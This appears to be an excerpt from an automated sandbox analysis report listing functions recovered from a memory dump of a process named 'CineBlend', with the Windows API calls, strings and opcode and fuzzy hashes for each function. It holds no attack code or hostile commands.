String ID:
API String ID: 3850602802-0
Opcode ID: 5c815de60ffd7ecfbe35698dd99217ac6b4504ca32a8b2c56fabbfd7a22a0066
Instruction ID: beab9136dbf4a822dcb08f03588368ce6be2c859f0f6fdafb15884d1a404aec5
Opcode Fuzzy Hash: 5c815de60ffd7ecfbe35698dd99217ac6b4504ca32a8b2c56fabbfd7a22a0066
Instruction Fuzzy Hash: ED11093A901219FFEF119BA9CD85F9DFBB8FB09750F200091EA01B7290D6716E10DB94

Function 00B41AAC Relevance: 6.1, APIs: 4, Instructions: 56COMMON

Download Yara Rule

APIs

Part of subcall function 00B4249F: GetWindowLongW.USER32(00000000,000000EB), ref: 00B424B0

DefDlgProcW.USER32(?,00000020,?,00000000), ref: 00B41AF4
GetClientRect.USER32(?,?), ref: 00B831F9
GetCursorPos.USER32(?), ref: 00B83203
ScreenToClient.USER32(?,?), ref: 00B8320E

Memory Dump Source

Source File: 00000021.00000002.1809675744.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true

Associated: 00000021.00000002.1809657215.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809734445.0000000000BDD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809734445.0000000000C03000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809784288.0000000000C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809808119.0000000000C15000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_b40000_CineBlend.jbxd

Similarity

API ID: Client$CursorLongProcRectScreenWindow
String ID:
API String ID: 4127811313-0
Opcode ID: 2749b390836cc6fb182b6985fed8ef381160266fa08c300d1be5efe2d4a913e0
Instruction ID: 685d57101d28d92a87f3bd5c387e8f51a49a1f3b0f0c4907d60a06878979e8a0
Opcode Fuzzy Hash: 2749b390836cc6fb182b6985fed8ef381160266fa08c300d1be5efe2d4a913e0
Instruction Fuzzy Hash: 36113A31A01519BBDB00EFA8C9859EEB7F8EB05745F100892E912E3150D771BB91DBA1

Function 00BAEAED Relevance: 6.1, APIs: 4, Instructions: 55synchronizationthreadwindowCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 00BAEB14
MessageBoxW.USER32(?,?,?,?), ref: 00BAEB47
WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 00BAEB5D
CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00BAEB64

Memory Dump Source

Source File: 00000021.00000002.1809675744.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true

Associated: 00000021.00000002.1809657215.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809734445.0000000000BDD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809734445.0000000000C03000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809784288.0000000000C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809808119.0000000000C15000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_b40000_CineBlend.jbxd

Similarity

API ID: CloseCurrentHandleMessageObjectSingleThreadWait
String ID:
API String ID: 2880819207-0
Opcode ID: da3b312dc8d554c8259264ac68fc1509345b4eaca3d210e7926df578e6aae27e
Instruction ID: 17440a9c41cc5122371415e86f883a7b3f6cab34fcaaece5e707a0617ecada5e
Opcode Fuzzy Hash: da3b312dc8d554c8259264ac68fc1509345b4eaca3d210e7926df578e6aae27e
Instruction Fuzzy Hash: 9B112B76905218BFCB019BA89C49BDE7FECEB47320F408256F835E32A0D674C90487B0

Function 00B6D53C Relevance: 6.1, APIs: 4, Instructions: 55threadCOMMON

Download Yara Rule

APIs

CreateThread.KERNEL32(00000000,?,00B6D369,00000000,00000004,00000000), ref: 00B6D588
GetLastError.KERNEL32 ref: 00B6D594
__dosmaperr.LIBCMT ref: 00B6D59B
ResumeThread.KERNEL32(00000000), ref: 00B6D5B9

Memory Dump Source

Source File: 00000021.00000002.1809675744.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true

Associated: 00000021.00000002.1809657215.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809734445.0000000000BDD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809734445.0000000000C03000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809784288.0000000000C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809808119.0000000000C15000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_b40000_CineBlend.jbxd

Similarity

API ID: Thread$CreateErrorLastResume__dosmaperr
String ID:
API String ID: 173952441-0
Opcode ID: 356a16109cf2182b6e4ea30d0636e8905079764cfecab65d27d6a1c3cd5814b2
Instruction ID: d682b0a3a59d3e8cb634f8658ac41ec2d4cdea3c504e6be61ba4e751c887d4f3
Opcode Fuzzy Hash: 356a16109cf2182b6e4ea30d0636e8905079764cfecab65d27d6a1c3cd5814b2
Instruction Fuzzy Hash: FA01F932E011147BCB106FA5EC05BAE7BE8EF81334F100396F926871E0DF748800C6A1

Function 00B47873 Relevance: 6.1, APIs: 4, Instructions: 53windowCOMMON

Download Yara Rule

APIs

CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00B478B1
GetStockObject.GDI32(00000011), ref: 00B478C5
SendMessageW.USER32(00000000,00000030,00000000), ref: 00B478CF

Memory Dump Source

Source File: 00000021.00000002.1809675744.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true

Associated: 00000021.00000002.1809657215.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809734445.0000000000BDD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809734445.0000000000C03000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809784288.0000000000C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809808119.0000000000C15000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_b40000_CineBlend.jbxd

Similarity

API ID: CreateMessageObjectSendStockWindow
String ID:
API String ID: 3970641297-0
Opcode ID: 16eb688cd515967e70ca5600401d34efb2c001c62fd953168ce172d60ece34ad
Instruction ID: 3d60e179af780991480a073abe0dc7d3ce2f60ece7268769586d1a5f827593b3
Opcode Fuzzy Hash: 16eb688cd515967e70ca5600401d34efb2c001c62fd953168ce172d60ece34ad
Instruction Fuzzy Hash: 1511AD72546509BFDF125F95CC58EEABBA9FF08364F040156FA0092120DB319D60FBA0

Function 00B733E6 Relevance: 6.1, APIs: 4, Instructions: 52libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(00000000,00000000,00000800,00BB11D9,00000000,00000000,?,00B7338D,00BB11D9,00000000,00000000,00000000,?,00B735FE,00000006,FlsSetValue), ref: 00B73418
GetLastError.KERNEL32(?,00B7338D,00BB11D9,00000000,00000000,00000000,?,00B735FE,00000006,FlsSetValue,00BE3260,FlsSetValue,00000000,00000364,?,00B731B9), ref: 00B73424
LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,00B7338D,00BB11D9,00000000,00000000,00000000,?,00B735FE,00000006,FlsSetValue,00BE3260,FlsSetValue,00000000), ref: 00B73432

Memory Dump Source

Source File: 00000021.00000002.1809675744.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true

Associated: 00000021.00000002.1809657215.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809734445.0000000000BDD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809734445.0000000000C03000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809784288.0000000000C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809808119.0000000000C15000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_b40000_CineBlend.jbxd

Similarity

API ID: LibraryLoad$ErrorLast
String ID:
API String ID: 3177248105-0
Opcode ID: b91af0f523a4d9a1096639a5ae4d1bb7055b3b67ba3b5a9933d36687c2ea683f
Instruction ID: 3ba0dbb568e9a29d6b88897c9d3c1cb1906e3a81cb4e63990d9a55ee4c928a92
Opcode Fuzzy Hash: b91af0f523a4d9a1096639a5ae4d1bb7055b3b67ba3b5a9933d36687c2ea683f
Instruction Fuzzy Hash: 8B01F732652222ABCB364B79DC44A567BD8FF05F617218260F96EE7380DB20DD01D6E4

Function 00BA7DCB Relevance: 6.1, APIs: 4, Instructions: 51registryCOMMON

Download Yara Rule

APIs

GetModuleFileNameW.KERNEL32(?,?,00000104,00000000), ref: 00BA7DE6
LoadTypeLibEx.OLEAUT32(?,00000002,?), ref: 00BA7DFE
RegisterTypeLib.OLEAUT32(?,?,00000000), ref: 00BA7E13
RegisterTypeLibForUser.OLEAUT32(?,?,00000000), ref: 00BA7E31

Memory Dump Source

Source File: 00000021.00000002.1809675744.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true

Associated: 00000021.00000002.1809657215.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809734445.0000000000BDD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809734445.0000000000C03000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809784288.0000000000C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809808119.0000000000C15000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_b40000_CineBlend.jbxd

Similarity

API ID: Type$Register$FileLoadModuleNameUser
String ID:
API String ID: 1352324309-0
Opcode ID: a9e3a400f2a54a2565204cc4588c975ef8be6a7935bda3f9e39b09502055e7db
Instruction ID: 27032a3d3cb7a49eb73362b88d3936490fab701ec5fe46afc53e5af81a358f7d
Opcode Fuzzy Hash: a9e3a400f2a54a2565204cc4588c975ef8be6a7935bda3f9e39b09502055e7db
Instruction Fuzzy Hash: 19116DB128E705ABE7208F64ED48B92BBFCEB05B00F1085E9A656D7150EBB1ED04DB50

Function 00BABA6F Relevance: 6.0, APIs: 4, Instructions: 50sleepCOMMON

Download Yara Rule

APIs

QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,00BAB69A,?,00008000), ref: 00BABA8B
Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,00BAB69A,?,00008000), ref: 00BABAB0
QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,00BAB69A,?,00008000), ref: 00BABABA
Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,00BAB69A,?,00008000), ref: 00BABAED

Memory Dump Source

Source File: 00000021.00000002.1809675744.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true

Associated: 00000021.00000002.1809657215.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809734445.0000000000BDD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809734445.0000000000C03000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809784288.0000000000C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809808119.0000000000C15000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_b40000_CineBlend.jbxd

Similarity

API ID: CounterPerformanceQuerySleep
String ID:
API String ID: 2875609808-0
Opcode ID: ab049d3840e7a859c5aa878c1935cb7690b9217324bb73268af00eff901505dd
Instruction ID: 6eb2301e9cccabb2a4a0735cbf80c188a74017262f77df17c96364bf2b3bf7ce
Opcode Fuzzy Hash: ab049d3840e7a859c5aa878c1935cb7690b9217324bb73268af00eff901505dd
Instruction Fuzzy Hash: 9C117930C05A29E7CF009FA4E948BEEBBB8FF0A711F1140C6D991B2141DF308650CBA1

Function 00BD886F Relevance: 6.0, APIs: 4, Instructions: 46COMMON

Download Yara Rule

APIs

GetWindowRect.USER32(?,?), ref: 00BD888E
ScreenToClient.USER32(?,?), ref: 00BD88A6
ScreenToClient.USER32(?,?), ref: 00BD88CA
InvalidateRect.USER32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 00BD88E5

Memory Dump Source

Source File: 00000021.00000002.1809675744.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true

Associated: 00000021.00000002.1809657215.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809734445.0000000000BDD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809734445.0000000000C03000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809784288.0000000000C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809808119.0000000000C15000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_b40000_CineBlend.jbxd

Similarity

API ID: ClientRectScreen$InvalidateWindow
String ID:
API String ID: 357397906-0
Opcode ID: 14ee9091632bff16daa08ed9cd0048f610d4f41da2b44d400b914471c3bbf584
Instruction ID: 992563e058ee6158465775a598fe0b097d48709528f43993c173d0fa57e6dfae
Opcode Fuzzy Hash: 14ee9091632bff16daa08ed9cd0048f610d4f41da2b44d400b914471c3bbf584
Instruction Fuzzy Hash: 041143B9D01209AFDB41CF98C884AEEFBF5FB08311F504156E955E3610E735AA54DF90

Function 00BA36F4 Relevance: 6.0, APIs: 4, Instructions: 34threadwindowtimeCOMMON

Download Yara Rule

APIs

SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 00BA3712
GetWindowThreadProcessId.USER32(?,00000000), ref: 00BA3723
GetCurrentThreadId.KERNEL32 ref: 00BA372A
AttachThreadInput.USER32(00000000,?,00000000,00000000), ref: 00BA3731

Memory Dump Source

Source File: 00000021.00000002.1809675744.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true

Associated: 00000021.00000002.1809657215.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809734445.0000000000BDD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809734445.0000000000C03000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809784288.0000000000C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809808119.0000000000C15000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_b40000_CineBlend.jbxd

Similarity

API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
String ID:
API String ID: 2710830443-0
Opcode ID: 647a2d13e7e149e968528e84fc6de12dc0c777a00cd3df1954e96b576940eb2b
Instruction ID: 6b6f77d21fe6dce85e42466b89b68cc36fc30d799cadd2501628394e7ecd809d
Opcode Fuzzy Hash: 647a2d13e7e149e968528e84fc6de12dc0c777a00cd3df1954e96b576940eb2b
Instruction Fuzzy Hash: D9E06DB12062247ADA2017A29C8DEEBBFACDF43BA1F400096F105D2080EEA0C940C2B0

Function 00BD92BF Relevance: 6.0, APIs: 4, Instructions: 31COMMON

Download Yara Rule

APIs

Part of subcall function 00B41F2D: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00B41F87
Part of subcall function 00B41F2D: SelectObject.GDI32(?,00000000), ref: 00B41F96
Part of subcall function 00B41F2D: BeginPath.GDI32(?), ref: 00B41FAD
Part of subcall function 00B41F2D: SelectObject.GDI32(?,00000000), ref: 00B41FD6

MoveToEx.GDI32(?,00000000,00000000,00000000), ref: 00BD92E3
LineTo.GDI32(?,?,?), ref: 00BD92F0
EndPath.GDI32(?), ref: 00BD9300
StrokePath.GDI32(?), ref: 00BD930E

Memory Dump Source

Source File: 00000021.00000002.1809675744.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true

Associated: 00000021.00000002.1809657215.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809734445.0000000000BDD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809734445.0000000000C03000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809784288.0000000000C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809808119.0000000000C15000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_b40000_CineBlend.jbxd

Similarity

API ID: Path$ObjectSelect$BeginCreateLineMoveStroke
String ID:
API String ID: 1539411459-0
Opcode ID: 0f8e8f83b7b9081e287671623b3268dbf90cdbfc386ae9059fcd72c35565e1de
Instruction ID: ef6ea1c1ddcd10ec0c470555381422be44f60aaa82bfca8fe5085d7af083f360
Opcode Fuzzy Hash: 0f8e8f83b7b9081e287671623b3268dbf90cdbfc386ae9059fcd72c35565e1de
Instruction Fuzzy Hash: BDF0E231002258BBDB121F58AC0EFCE7F99AF0A320F008042FA15220E1DB755522DFE9

Function 00B421A0 Relevance: 6.0, APIs: 4, Instructions: 23COMMON

Download Yara Rule

APIs

GetSysColor.USER32(00000008), ref: 00B421BC
SetTextColor.GDI32(?,?), ref: 00B421C6
SetBkMode.GDI32(?,00000001), ref: 00B421D9
GetStockObject.GDI32(00000005), ref: 00B421E1

Memory Dump Source

Source File: 00000021.00000002.1809675744.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true

Associated: 00000021.00000002.1809657215.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809734445.0000000000BDD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809734445.0000000000C03000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809784288.0000000000C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809808119.0000000000C15000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_b40000_CineBlend.jbxd

Similarity

API ID: Color$ModeObjectStockText
String ID:
API String ID: 4037423528-0
Opcode ID: 9764ae0fefbc780c7ca2bda39d9b501b7614430f6c120da9ef9039a02c4b5b4a
Instruction ID: e47a1700b3826379719e272687fa7b66428ec9fff8d545c60dd36d9f88d51bc1
Opcode Fuzzy Hash: 9764ae0fefbc780c7ca2bda39d9b501b7614430f6c120da9ef9039a02c4b5b4a
Instruction Fuzzy Hash: BAE09B31241640AEDB215F74BC197E97F91EB11735F04825AF7F5650E0DB718640DB10

Function 00B9EC36 Relevance: 6.0, APIs: 4, Instructions: 19COMMON

Download Yara Rule

APIs

GetDesktopWindow.USER32 ref: 00B9EC36
GetDC.USER32(00000000), ref: 00B9EC40
GetDeviceCaps.GDI32(00000000,0000000C), ref: 00B9EC60
ReleaseDC.USER32(?), ref: 00B9EC81

Memory Dump Source

Source File: 00000021.00000002.1809675744.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true

Associated: 00000021.00000002.1809657215.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809734445.0000000000BDD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809734445.0000000000C03000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809784288.0000000000C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809808119.0000000000C15000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_b40000_CineBlend.jbxd

Similarity

API ID: CapsDesktopDeviceReleaseWindow
String ID:
API String ID: 2889604237-0
Opcode ID: 3ce83080fbd747381a0625dc778a09d74e71d2c3783afd41f7cf777681457fee
Instruction ID: a4cd0a4c8de009364b750ffde423db567daeff1908479c81b4cab660611d013d
Opcode Fuzzy Hash: 3ce83080fbd747381a0625dc778a09d74e71d2c3783afd41f7cf777681457fee
Instruction Fuzzy Hash: 87E01A70805204DFCF409FA0C958A5DFBF5FB48311F10849AE99AE3250DB389A01AF40

Function 00B9EC4A Relevance: 6.0, APIs: 4, Instructions: 18COMMON

Download Yara Rule

APIs

GetDesktopWindow.USER32 ref: 00B9EC4A
GetDC.USER32(00000000), ref: 00B9EC54
GetDeviceCaps.GDI32(00000000,0000000C), ref: 00B9EC60
ReleaseDC.USER32(?), ref: 00B9EC81

Memory Dump Source

Source File: 00000021.00000002.1809675744.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true

Associated: 00000021.00000002.1809657215.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809734445.0000000000BDD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809734445.0000000000C03000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809784288.0000000000C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809808119.0000000000C15000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_b40000_CineBlend.jbxd

Similarity

API ID: CapsDesktopDeviceReleaseWindow
String ID:
API String ID: 2889604237-0
Opcode ID: cacf1e423cdba1189049dc035ce6754f714ebefc4709f08c2ef5c4f43be41275
Instruction ID: 8bbc14713a86f8117e630a51c4b902799a0b7035124e32e4cecc53e64657e75e
Opcode Fuzzy Hash: cacf1e423cdba1189049dc035ce6754f714ebefc4709f08c2ef5c4f43be41275
Instruction Fuzzy Hash: D9E01A70C01204DFCF409FA0C858A5DFBF5FB48311F10848AE999E3250DB389A019F40

Function 00BB57CC Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 230shareCOMMON

Download Yara Rule

APIs

Part of subcall function 00B441EA: _wcslen.LIBCMT ref: 00B441EF

WNetUseConnectionW.MPR(00000000,?,0000002A,00000000,?,?,0000002A,?), ref: 00BB5919

Strings

LPT, xrefs: 00BB5840
*, xrefs: 00BB5855

Memory Dump Source

Source File: 00000021.00000002.1809675744.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true

Associated: 00000021.00000002.1809657215.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809734445.0000000000BDD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809734445.0000000000C03000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809784288.0000000000C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809808119.0000000000C15000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_b40000_CineBlend.jbxd

Similarity

API ID: Connection_wcslen
String ID: *$LPT
API String ID: 1725874428-3443410124
Opcode ID: 91ce6fba07127bf2d8833c47529151f53ecfeda8572a95ed5b851374e1d15815
Instruction ID: 1564f0ea83fc0ed331e63771591b9ea62cef77a16ced8fdb1590d0363a8013cc
Opcode Fuzzy Hash: 91ce6fba07127bf2d8833c47529151f53ecfeda8572a95ed5b851374e1d15815
Instruction Fuzzy Hash: 2D914B75A006049FCB24DF54C8D4BAABBF5EF44314F1980D9E849AB362C7B1EE85CB91

Function 00B6E5ED Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 189COMMON

Download Yara Rule

APIs

__startOneArgErrorHandling.LIBCMT ref: 00B6E67D

Strings

pow, xrefs: 00B6E655, 00B6E672

Memory Dump Source

Source File: 00000021.00000002.1809675744.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true

Associated: 00000021.00000002.1809657215.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809734445.0000000000BDD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809734445.0000000000C03000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809784288.0000000000C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809808119.0000000000C15000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_b40000_CineBlend.jbxd

Similarity

API ID: ErrorHandling__start
String ID: pow
API String ID: 3213639722-2276729525
Opcode ID: 2363632fd159401483ab7fa57c2ed2ecc3753f3e322cbacb255e1d08996d1611
Instruction ID: e1b35e3e480afdc993a76b631e904a730f679efe5cc662d57011a155751ae9d1
Opcode Fuzzy Hash: 2363632fd159401483ab7fa57c2ed2ecc3753f3e322cbacb255e1d08996d1611
Instruction Fuzzy Hash: E251C165E4810286CB117714CD8937A2BE4EB14B00F70CDD8F0B9972E9DF39CD959B86

Function 00B5A8EC Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 184COMMON

Download Yara Rule

Strings

#, xrefs: 00B5A916

Memory Dump Source

Source File: 00000021.00000002.1809675744.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true

Associated: 00000021.00000002.1809657215.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809734445.0000000000BDD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809734445.0000000000C03000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809784288.0000000000C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809808119.0000000000C15000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_b40000_CineBlend.jbxd

Similarity

API ID:
String ID: #
API String ID: 0-1885708031
Opcode ID: 4bedafbfd537358252a37a7af427e77c6da644d1f843018b88c504a565adc5bd
Instruction ID: 80ed5e2a0353e0031f91690854ac7b338aefb063490ff631e3762897565e63d2
Opcode Fuzzy Hash: 4bedafbfd537358252a37a7af427e77c6da644d1f843018b88c504a565adc5bd
Instruction Fuzzy Hash: 605120315042469FCF26DF28C481ABA7BE4EF16310F6541E9EC91AB3D1DB349D86CBA1

Function 00B5F6CA Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 144sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(00000000), ref: 00B5F6DB
GlobalMemoryStatusEx.KERNEL32(?), ref: 00B5F6F4

Strings

@, xrefs: 00B5F6E8

Memory Dump Source

Source File: 00000021.00000002.1809675744.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true

Associated: 00000021.00000002.1809657215.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809734445.0000000000BDD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809734445.0000000000C03000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809784288.0000000000C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809808119.0000000000C15000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_b40000_CineBlend.jbxd

Similarity

API ID: GlobalMemorySleepStatus
String ID: @
API String ID: 2783356886-2766056989
Opcode ID: 2327e718b6e0c153a98253ea6eb69a0c5445c8e6f30f87990ac4fdc3906503f1
Instruction ID: 6b98da3cd24c68363b5771a4ae5fe7e49f2471d3b0c0fc6967f630242a0df9d6
Opcode Fuzzy Hash: 2327e718b6e0c153a98253ea6eb69a0c5445c8e6f30f87990ac4fdc3906503f1
Instruction Fuzzy Hash: 48514C724087489BD320AF14DC86BAFB7E8FF95304F81489DF1D952191DF708629CB66

Function 00BC61A2 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 125COMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?,?,?,?,?), ref: 00BC623D
_wcslen.LIBCMT ref: 00BC6249

Strings

CALLARGARRAY, xrefs: 00BC6243, 00BC6248

Memory Dump Source

Source File: 00000021.00000002.1809675744.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true

Associated: 00000021.00000002.1809657215.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809734445.0000000000BDD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809734445.0000000000C03000.00000002.00000001.01000000.0000000B.sdmpDownload File
